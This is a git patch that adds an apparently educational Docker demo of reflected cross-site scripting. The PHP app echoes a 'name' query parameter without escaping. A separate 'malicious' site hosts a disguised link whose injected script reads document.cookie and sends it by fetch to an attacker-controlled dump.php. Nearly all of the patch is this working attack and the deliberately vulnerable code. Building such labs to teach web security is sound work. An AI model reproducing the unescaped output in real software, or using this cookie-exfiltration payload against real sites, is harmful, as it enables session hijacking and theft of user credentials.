From c72b7b3b7f65990412cfd941316e252ea4c32773 Mon Sep 17 00:00:00 2001
From: Daniel-I-Am <djdecloet@gmail.com>
Date: Tue, 23 Nov 2021 18:24:38 +0100
Subject: [PATCH] Add demo XSS application

---
 app/index.php       | 41 +++++++++++++++++++++++++++
 app/login.php       | 28 +++++++++++++++++++
 docker-compose.yml  | 17 ++++++++++++
 malicious/dump.php  |  3 ++
 malicious/index.php | 20 +++++++++++++
 proxy.conf          | 68 +++++++++++++++++++++++++++++++++++++++++++++
 6 files changed, 177 insertions(+)
 create mode 100644 app/index.php
 create mode 100644 app/login.php
 create mode 100644 docker-compose.yml
 create mode 100644 malicious/dump.php
 create mode 100644 malicious/index.php
 create mode 100644 proxy.conf

diff --git a/app/index.php b/app/index.php
new file mode 100644
index 0000000..add697c
--- /dev/null
+++ b/app/index.php
@@ -0,0 +1,41 @@
+<?php if ( empty(session_id()) ) session_start(); ?>
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>SBD XSS | Home</title>
+</head>
+<body>
+<?php
+if (isset($_GET["name"]))
+{
+    $name = $_GET["name"];
+?>
+    <div>Hey <?= $name ?>, how are you doing?</div>
+    <div>Enjoy this picture:</div>
+    <div><img src="//unsplash.it/256"></div>
+    <hr>
+<?php
+}
+?>
+
+    <div>
+        Hey, what's your name?
+    </div>
+    <form action="/" method="GET">
+        <input type="text" name="name" placeholder="Enter your name">
+        <input type="submit" value="Send">
+    </form>
+
+<?php
+if (isset($_SESSION["username"])) {
+?>
+    <div>I know you are logged in as <?= htmlspecialchars($_SESSION["username"]) ?></div>
+<?php
+}
+?>
+</body>
+</html>
diff --git a/app/login.php b/app/login.php
new file mode 100644
index 0000000..36255df
--- /dev/null
+++ b/app/login.php
@@ -0,0 +1,28 @@
+<?php
+if ( empty(session_id()) ) session_start();
+
+if ($_SERVER["REQUEST_METHOD"] === "POST") {
+    $_SESSION["username"] = $_POST["username"];
+    header("Location: /");
+    return;
+}
+?>
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>SBD XSS | Login</title>
+</head>
+<body>
+    <div>
+        Hey, what's your name?
+    </div>
+    <form action="/login.php" method="POST">
+        <input type="text" name="username" placeholder="Enter your username">
+        <input type="submit" value="Log in">
+    </form>
+</body>
+</html>
diff --git a/docker-compose.yml b/docker-compose.yml
new file mode 100644
index 0000000..815a601
--- /dev/null
+++ b/docker-compose.yml
@@ -0,0 +1,17 @@
+version: "3.8"
+services:
+  app:
+    image: php:8.0-apache
+    volumes:
+      - "./app:/var/www/html/"
+  malicious:
+    image: php:8.0-apache
+    volumes:
+      - "./malicious:/var/www/html/"
+  proxy:
+    image: nginx
+    ports:
+      - "8080:8080"
+      - "8081:8081"
+    volumes:
+      - "./proxy.conf:/etc/nginx/nginx.conf:ro"
diff --git a/malicious/dump.php b/malicious/dump.php
new file mode 100644
index 0000000..6f2371d
--- /dev/null
+++ b/malicious/dump.php
@@ -0,0 +1,3 @@
+<?php
+
+var_dump($_GET["data"]); // Do something with the data, I have it now!
diff --git a/malicious/index.php b/malicious/index.php
new file mode 100644
index 0000000..247fb50
--- /dev/null
+++ b/malicious/index.php
@@ -0,0 +1,20 @@
+<?php
+
+$payload = <<<EOS
+fetch(`http://localhost:8081/dump.php?data=\${encodeURIComponent(document.cookie)}`).then(() => {window.location.href='/?name=Blegh';});
+EOS
+
+?>
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Totally legit website</title>
+</head>
+<body>
+    <a href="http://localhost:8080/?name=Blegh<script><?= $payload ?></script>">This link has a nice picture</a>
+</body>
+</html>
diff --git a/proxy.conf b/proxy.conf
new file mode 100644
index 0000000..f75a2be
--- /dev/null
+++ b/proxy.conf
@@ -0,0 +1,68 @@
+user  nginx;
+worker_processes  auto;
+
+error_log  /var/log/nginx/error.log notice;
+pid        /var/run/nginx.pid;
+
+events {
+    worker_connections  1024;
+}
+
+http {
+    include       /etc/nginx/mime.types;
+    default_type  application/octet-stream;
+
+    log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
+                      '$status $body_bytes_sent "$http_referer" '
+                      '"$http_user_agent" "$http_x_forwarded_for"';
+
+    access_log  /var/log/nginx/access.log  main;
+
+    sendfile        on;
+    #tcp_nopush     on;
+
+    keepalive_timeout  65;
+
+    #gzip  on;
+
+    include /etc/nginx/conf.d/*.conf;
+
+    upstream app {
+        server app:80;
+    }
+
+    upstream malicious {
+        server malicious:80;
+    }
+
+    server {
+        listen 8080;
+
+        location / {
+            proxy_set_header    X-Forwarded-Host   $host; 
+            proxy_set_header    X-Forwarded-Server $host; 
+            proxy_set_header    X-Forwarded-For    $proxy_add_x_forwarded_for; 
+            proxy_set_header    X-Forwarded-Proto  $scheme; 
+            proxy_set_header    X-Real-IP          $remote_addr; 
+            proxy_set_header    Host               $host;
+            proxy_pass "http://app";
+        }
+    }
+
+    server {
+        listen 8081;
+
+        location / {
+            add_header 'Access-Control-Allow-Origin' '*';
+            add_header 'Access-Control-Allow-Credentials' 'true';
+
+            proxy_set_header    X-Forwarded-Host   $host; 
+            proxy_set_header    X-Forwarded-Server $host; 
+            proxy_set_header    X-Forwarded-For    $proxy_add_x_forwarded_for; 
+            proxy_set_header    X-Forwarded-Proto  $scheme; 
+            proxy_set_header    X-Real-IP          $remote_addr; 
+            proxy_set_header    Host               $host;
+            proxy_pass "http://malicious";
+        }
+    }
+}